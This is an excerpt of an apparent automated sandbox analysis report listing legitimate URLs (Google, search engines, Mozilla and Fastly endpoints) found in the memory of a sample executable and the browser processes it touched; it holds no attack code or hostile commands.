Source: chrome.exe, 00000004.00000003.1465256188.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493662612.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461286010.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1530180878.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632008118.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: EHCFBFBA.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.1632220255.00001B4400BF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.1632220255.00001B4400BF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_apia
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, EHCFBFBA.0.dr, HCAEHJJK.0.dr, Web Data.10.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.1632121222.00001B4400BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.1632121222.00001B4400BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.1632121222.00001B4400BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552652223.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr, HCAEHJJK.0.dr, Web Data.10.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.1463517264.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1549735239.00001B440018C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000002.1601708742.00001A3C0017C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.1600116038.00001B44006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1549162636.00001B440001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1631256288.00001B4400A8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1630406237.00001B44009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635908220.00001B4401160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1631318824.00001B4400AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000003.1465537318.00001B440033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1462692226.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460541764.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552832363.00001B44004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1469447429.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1460468204.00001B4400C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461434938.00001B44004B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1463517264.00001B4400C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorewflCUn3E=
Source: chrome.exe, 00000004.00000003.1440973614.00005C94006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000003.1440973614.00005C94006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000003.1440907938.00005C9400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000004.00000002.1549735239.00001B440018C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000002.1601708742.00001A3C0017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.10.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/_
Source: chrome.exe, 00000004.00000003.1436628621.00007660002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1436648073.00007660002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.1542409406.0000009ABBFFC000.00000004.00000010.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1631970373.00001B4400B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1549162636.00001B440001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000002.1600733062.00001A3C00040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.10.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.1630372530.00001B44009AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000004.00000002.1630372530.00001B44009AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000004.00000002.1558216996.00001B4400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 00000004.00000002.1632660081.00001B4400CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
Source: chrome.exe, 00000004.00000002.1632660081.00001B4400CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1Cross-Origin-Opener-Policy:
Source: chrome.exe, 00000004.00000002.1632660081.00001B4400CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1rj
Source: chrome.exe, 00000004.00000002.1632660081.00001B4400CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/cdt1
Source: chrome.exe, 00000004.00000002.1631185427.00001B4400A50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: 2cc80dabc69f58b6_0.10.dr, Reporting and NEL.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json0.10.dr	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552777691.00001B4400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552777691.00001B4400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.1553047769.00001B44004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635752962.00001B44010B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1551434034.00001B44002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.1553047769.00001B44004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635752962.00001B44010B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: DbMBWMxoNv.exe, DbMBWMxoNv.exe, 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929824193.000000006D121000.00000002.00000001.01000000.00000007.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, chrome.dll.0.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: manifest.json0.10.dr	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000004.00000002.1552161437.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632220255.00001B4400BF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr, HCAEHJJK.0.dr, Web Data.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr, HCAEHJJK.0.dr, Web Data.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, EHCFBFBA.0.dr, HCAEHJJK.0.dr, Web Data.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Bw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/F
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Iw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Lw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Nx
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Sw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Vw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Yx
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/fx
Source: chrome.exe, 00000004.00000003.1440907938.00005C9400684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/jw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/mx
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/px
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qw
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/zx
Source: chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~w
Source: chrome.exe, 00000004.00000003.1440907938.00005C9400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000004.00000003.1440907938.00005C9400684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000004.00000003.1440907938.00005C9400684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1496382973.00001B44016A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000004.00000002.1549136345.00001B440000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000008.00000002.1602555111.00001A3C00314000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000004.00000002.1558586249.00001B4400670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
